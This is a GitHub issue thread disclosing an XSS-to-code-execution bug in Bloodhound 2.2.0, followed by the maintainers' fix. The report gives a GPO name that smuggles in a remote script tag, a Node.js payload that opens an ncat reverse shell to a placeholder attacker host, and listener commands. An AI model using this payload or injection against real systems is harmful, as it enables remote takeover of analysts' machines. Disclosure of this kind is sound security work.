Code execution in Bloodhound via malicious AD Object

Question

Code execution in Bloodhound via malicious AD Object

6661620a opened this issue 5 years ago · 5 comments

Dear Bloodhound Team –

I identified a way to achieve code execution in Bloodhound 2.2.0 by creating a GPO with a name containing JavaScript code that will trigger in Bloodhound's search-autocomplete function. The injected JavaScript is not only a valid xss but also allows the creation of a child process.

The following steps are required to reproduce the vulnerability with a simple reverse shell using ncat:

Create a GPO with the following name:
aaaaaa<SCRIPT SRC="http://<attacker host>:<some port>/poc.js">
Run Sharphound
Invoke-BloodHound -Stealth
Import collected data
Host the following js payload as POC.JS (all uppercase is important here since the sharphound output json always has the value for the name field in upper case)
const { spawn } = require('child_process');
spawn('ncat', ['-e', '/bin/bash', '<attacker host>', '<some port>']);

e.g. with python -m SimpleHTTPServer <some port>

Start listener
nc -v -l -p <some port>
Search for "aa" in Bloodhound and catch the shell

I suppose there is still a lot of room for improving the actual exploit. Probably there are better strings to make it trigger on than "aaaaa" and I also would not consider JavaScript as one of my strengths but I hope I could prove my point here :)

I also made a video

Answer 1 · 2019-08-25T09:42:04.000Z

Hi, i am sure to understand the purpose of the GPO during the entire process - could you clarify please ? Sylvain

Answer 2 · 2019-08-25T11:03:50.000Z

Hi, i am sure to understand the purpose of the GPO during the entire process - could you clarify please ? Sylvain

A GPO can have all sorts of characters in its name. That's where the javascript payload is placed. The GPO has no other purpose than being read by sharphound and "export" the payload to sharphound's json output

Answer 3 · 2019-08-25T16:24:38.000Z

Thanks for the report, I'll work on fixing this ASAP! I've already identified the problem code

…

On Sun, Aug 25, 2019, 7:03 AM Fab ***@***.***> wrote: Hi, i am sure to understand the purpose of the GPO during the entire process - could you clarify please ? Sylvain A GPO can have all sorts of characters in its name. That's where the javascript payload is placed. The GPO has no other purpose than being read by sharphound and "export" the payload to sharphound's json output — You are receiving this because you are subscribed to this thread. Reply to this email directly, view it on GitHub <#267?email_source=notifications&email_token=ABLUS7SQHVUIR7NDDUH3OT3QGJRJZA5CNFSM4IPHZJZ2YY3PNVWWK3TUL52HS4DFVREXG43VMVBW63LNMVXHJKTDN5WW2ZLOORPWSZGOD5CRI7Q#issuecomment-524620926>, or mute the thread <https://github.com/notifications/unsubscribe-auth/ABLUS7UM2VA3RZIYNZ4RTADQGJRJZANCNFSM4IPHZJZQ> .

Answer 4 · 2019-08-26T00:27:47.000Z

I've pushed a potential fix for the issue in c48afcb

Going to test it a bit more as well

Answer 5 · 2019-08-28T20:07:34.000Z

The fix properly renders the characters as text, not as HTML tags. I also deployed a fix to another potentially injectable portion of the UI at the same time. @6661620a tested my fix as well and confirmed it works. I'm going to close this issue, and push a release out containing this fix.

Thanks again @6661620a !